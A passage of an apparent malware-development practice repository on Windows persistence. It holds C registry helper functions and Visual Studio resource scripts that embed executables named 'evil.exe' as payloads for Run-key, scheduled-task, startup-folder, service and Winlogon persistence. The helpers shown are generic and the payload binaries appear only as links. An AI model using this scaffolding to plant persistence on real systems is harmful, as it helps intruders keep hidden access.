55 | if (ERROR_SUCCESS != RegSetValueExW(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data))) {
56 | RegCloseKey(hKey);
57 | return FALSE;
58 | }
59 | // Close the key
60 | RegCloseKey(hKey);
61 | return TRUE;
62 | }
63 | return FALSE;
64 | }
65 |
66 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
67 | {
68 | DWORD Ret;
69 | HKEY hKey;
70 | // Open the key
71 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
72 | if (Ret == ERROR_SUCCESS) {
73 | if (ERROR_SUCCESS != RegSetValueExW(hKey, valueName, 0, REG_SZ, (LPBYTE)(strData), ((((DWORD)lstrlen(strData) + 1)) * 2))) {
74 | RegCloseKey(hKey);
75 | return FALSE;
76 | }
77 | RegCloseKey(hKey);
78 | return TRUE;
79 | }
80 | return FALSE;
81 | }
82 |
83 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData)
84 | {
85 | HKEY hKey;
86 | DWORD Ret;
87 | // Check if the registry exists
88 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_READ, &hKey);
89 | if (Ret == ERROR_SUCCESS) {
90 | DWORD data;
91 | DWORD len = sizeof(DWORD); // size of data
92 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (LPBYTE)(&data), &len);
93 | if (Ret == ERROR_SUCCESS) {
94 | RegCloseKey(hKey);
95 | (*readData) = data;
96 | return TRUE;
97 | }
98 | RegCloseKey(hKey);
99 | return TRUE;
100 | }
101 | else {
102 | return FALSE;
103 | }
104 | }
105 |
106 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData)
107 | {
108 | // Read customer infromation from the registry
109 | HKEY hKey;
110 | DWORD len = TOTAL_BYTES_READ;
111 | DWORD readDataLen = len;
112 | PWCHAR readBuffer = (PWCHAR)malloc(sizeof(PWCHAR) * len);
113 |
114 | if (readBuffer == NULL)
115 | return FALSE;
116 | // Check if the registry exists
117 | DWORD Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_READ, &hKey);
118 | if (Ret == ERROR_SUCCESS) {
119 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
120 | while (Ret == ERROR_MORE_DATA)
121 | {
122 | // Get a buffer that is big enough.
123 | len += OFFSET_BYTES;
124 | readBuffer = (PWCHAR)realloc(readBuffer, len);
125 | readDataLen = len;
126 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
127 | }
128 | if (Ret != ERROR_SUCCESS) {
129 | RegCloseKey(hKey);
130 | return FALSE;;
131 | }
132 | *readData = readBuffer;
133 | RegCloseKey(hKey);
134 | return TRUE;
135 | }
136 | else {
137 | return FALSE;
138 | }
139 | }
--------------------------------------------------------------------------------
/simple-persistence/run-registry/registry.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "AdvAPI32.Lib")
6 |
7 | #define TOTAL_BYTES_READ 1024
8 | #define OFFSET_BYTES 1024
9 |
10 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
11 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
12 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
13 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData);
14 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData);
--------------------------------------------------------------------------------
/simple-persistence/run-registry/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by run-registry.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/run-registry/run-registry.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/run-registry/run-registry.aps
--------------------------------------------------------------------------------
/simple-persistence/run-registry/run-registry.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/run-registry/run-registry.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/simple-persistence/run-registry/run-registry.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/scheduled-task/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by scheduled-task.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/scheduled-task.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/scheduled-task/scheduled-task.aps
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/scheduled-task.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/scheduled-task.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/scheduled-task.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/startup-folder/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by startup-folder.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/startup-folder.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/startup-folder/startup-folder.aps
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/startup-folder.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/startup-folder.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/startup-folder.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/windows-service/bin/evil-service.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/windows-service/bin/evil-service.exe
--------------------------------------------------------------------------------
/simple-persistence/windows-service/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by windows-service.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/windows-service/windows-service.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/windows-service/windows-service.aps
--------------------------------------------------------------------------------
/simple-persistence/windows-service/windows-service.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil-service.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/windows-service/windows-service.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/simple-persistence/windows-service/windows-service.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/winlogon-registry/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/reg/Winlogon.reg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/winlogon-registry/reg/Winlogon.reg
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/registry.c:
--------------------------------------------------------------------------------
1 | #include "registry.h"
2 |
3 | /*
4 | * Example to used:
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = nullptr;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, "Aticleworld"); //create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordInRegistry(HKEY_CURRENT_USER, "Aticleworld","date",12082016); //write dword
13 | if (status != TRUE) return FALSE;
14 |
15 | status = readDwordValueRegistry(HKEY_CURRENT_USER, "Aticleworld", "date", &readData); //read dword
16 | if (status != TRUE) return FALSE;
17 | printf("%ld", readData);
18 |
19 | status = writeStringInRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", "Happy"); //write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = readUserInfoFromRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", &readMessage); //read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != nullptr) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage);
27 | readMessage = nullptr;
28 | }
29 | */
30 |
31 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
32 | {
33 | DWORD dwDisposition; // It verify new key is created or open existing key
34 | HKEY hKey;
35 | DWORD Ret;
36 |
37 | Ret = RegCreateKeyExW(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
38 | if (Ret != ERROR_SUCCESS) {
39 | printf(" [-] Error Opening or Creating new key. Code = %d\n", GetLastError());
40 | return FALSE;
41 | }
42 | //close the key
43 | RegCloseKey(hKey);
44 | return TRUE;
45 | }
46 |
47 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
48 | {
49 | DWORD Ret;
50 | HKEY hKey;
51 | // Open the key
52 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
53 | if (Ret == ERROR_SUCCESS) {
54 | // Set the value in key
55 | if (ERROR_SUCCESS != RegSetValueExW(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data))) {
56 | RegCloseKey(hKey);
57 | return FALSE;
58 | }
59 | // Close the key
60 | RegCloseKey(hKey);
61 | return TRUE;
62 | }
63 | return FALSE;
64 | }
65 |
66 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
67 | {
68 | DWORD Ret;
69 | HKEY hKey;
70 | // Open the key
71 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
72 | if (Ret == ERROR_SUCCESS) {
73 | if (ERROR_SUCCESS != RegSetValueExW(hKey, valueName, 0, REG_SZ, (LPBYTE)(strData), ((((DWORD)lstrlen(strData) + 1)) * 2))) {
74 | RegCloseKey(hKey);
75 | return FALSE;
76 | }
77 | RegCloseKey(hKey);
78 | return TRUE;
79 | }
80 | return FALSE;
81 | }
82 |
83 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData)
84 | {
85 | HKEY hKey;
86 | DWORD Ret;
87 | // Check if the registry exists
88 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_READ, &hKey);
89 | if (Ret == ERROR_SUCCESS) {
90 | DWORD data;
91 | DWORD len = sizeof(DWORD); // size of data
92 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (LPBYTE)(&data), &len);
93 | if (Ret == ERROR_SUCCESS) {
94 | RegCloseKey(hKey);
95 | (*readData) = data;
96 | return TRUE;
97 | }
98 | RegCloseKey(hKey);
99 | return TRUE;
100 | }
101 | else {
102 | return FALSE;
103 | }
104 | }
105 |
106 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData)
107 | {
108 | // Read customer infromation from the registry
109 | HKEY hKey;
110 | DWORD len = TOTAL_BYTES_READ;
111 | DWORD readDataLen = len;
112 | PWCHAR readBuffer = (PWCHAR)malloc(sizeof(PWCHAR) * len);
113 |
114 | if (readBuffer == NULL)
115 | return FALSE;
116 | // Check if the registry exists
117 | DWORD Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_READ, &hKey);
118 | if (Ret == ERROR_SUCCESS) {
119 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
120 | while (Ret == ERROR_MORE_DATA)
121 | {
122 | // Get a buffer that is big enough.
123 | len += OFFSET_BYTES;
124 | readBuffer = (PWCHAR)realloc(readBuffer, len);
125 | readDataLen = len;
126 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
127 | }
128 | if (Ret != ERROR_SUCCESS) {
129 | RegCloseKey(hKey);
130 | return FALSE;;
131 | }
132 | *readData = readBuffer;
133 | RegCloseKey(hKey);
134 | return TRUE;
135 | }
136 | else {
137 | return FALSE;
138 | }
139 | }
140 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/registry.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "AdvAPI32.Lib")
6 |
7 | #define TOTAL_BYTES_READ 1024
8 | #define OFFSET_BYTES 1024
9 |
10 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
11 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
12 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
13 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData);
14 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData);
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by winlogon-registry.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/winlogon-registry.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/winlogon-registry/winlogon-registry.aps
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/winlogon-registry.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/winlogon-registry.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
